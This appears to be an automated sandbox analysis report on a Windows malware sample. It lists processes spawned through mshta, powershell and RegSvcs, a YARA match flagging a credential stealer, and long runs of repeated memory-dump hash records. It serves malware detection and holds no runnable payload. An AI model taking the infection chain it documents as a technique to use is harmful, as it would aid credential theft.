                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                Start time:04:09:06
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:04:09:06
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:04:09:10
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                Imagebase:0xfe0000
                                                                                                                                                                                                File size:45'984 bytes
                                                                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:04:09:10
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                Imagebase:0x750000
                                                                                                                                                                                                File size:45'984 bytes
                                                                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:04:09:10
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                Imagebase:0xd00000
                                                                                                                                                                                                File size:45'984 bytes
                                                                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Reset < >
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2062822636.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                                                                                                                                                  • Instruction ID: 7751a646eaf869edea33559e4a2383cdbafb38eb3a9baaa8760fd3dac5d19060
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3695DB36E882CB45
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083054826.0000020E2D0C1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2D0C1000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2d0c1000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f18645dcf0c63c7b7e6b573ddf2959d143f876985197ef9a4ee3b61a51ebd225
                                                                                                                                                                                                  • Instruction ID: a68a7a7ff483c8197b6657380ff5e78da1510a9f45cb8f5cf266e2d006d3dd13
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f18645dcf0c63c7b7e6b573ddf2959d143f876985197ef9a4ee3b61a51ebd225
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F1C22151DB845FEB56EB28845AB68BFE1EF1A300F0949DED9CACB1F3C515D882C346
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083054826.0000020E2D0C1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2D0C1000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2d0c1000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 43b6a65aa0b405e55e82e552382372787124976d2c225d86a5722eb8ee5e4dd2
                                                                                                                                                                                                  • Instruction ID: aa2936c233ae27568873a32ba94d65f03c8f0aa303361deef73a42f72c27c61e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b6a65aa0b405e55e82e552382372787124976d2c225d86a5722eb8ee5e4dd2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10E01A0164FBC45FD787A378096DB607FA19F57500B5E48CFE584CB1B3D81A8A26C312
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083003711.0000020E2D0C4000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2D0C4000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2d0c4000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: dae827f04151e4423935f5d0d163da8eb8cd7ce4191df2f03ce7840dc45204ae
                                                                                                                                                                                                  • Instruction ID: 8b56675505fcfd1e04026e3e084a910bee5a70c51feb59b55d23938f544d3633
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dae827f04151e4423935f5d0d163da8eb8cd7ce4191df2f03ce7840dc45204ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1B0121181D7505EF6111170080C4182665C7552C0F2608834C01D7063ED149D820171
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:2.1%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:10
                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                  execution_graph 6983 7ff8488f04c9 6984 7ff8488f04df ResumeThread 6983->6984 6986 7ff8488f05a6 6984->6986 6987 7ff8488ef869 6989 7ff8488ef804 6987->6989 6988 7ff8488ef87a 6989->6988 6990 7ff8488ef82e 6989->6990 6993 7ff8488ee098 6990->6993 6994 7ff8488f04e0 ResumeThread 6993->6994 6996 7ff8488ef84a 6994->6996

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2339084545.00007FF8488E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8488e0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ee500a0ac798d2fbfb13d65ed8c0a106e08eeb575e42ebc5ddf5e655df7d168f
                                                                                                                                                                                                  • Instruction ID: 96a3c1d0294731e6e4760c5436d17cac4b6552ea75cbfdc9506e90f2e72a51a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee500a0ac798d2fbfb13d65ed8c0a106e08eeb575e42ebc5ddf5e655df7d168f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B513D32E0DB994FD755EB6C58992F97FE0EF52261F0801BBC048CB1A3DA18540AC755

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 56 7ff8488f04c9-7ff8488f05a4 ResumeThread 63 7ff8488f05a6 56->63 64 7ff8488f05ac-7ff8488f05d1 56->64 63->64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2339084545.00007FF8488E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8488e0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                  • Opcode ID: f36a7c5e29202a8b703672d22520b50136e8a6374c3c655929db95ba51231315
                                                                                                                                                                                                  • Instruction ID: c9e24de15f96d66fca6b82bc61cd46e99f30b5365a0f4e7a389a54e9b111b7d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f36a7c5e29202a8b703672d22520b50136e8a6374c3c655929db95ba51231315
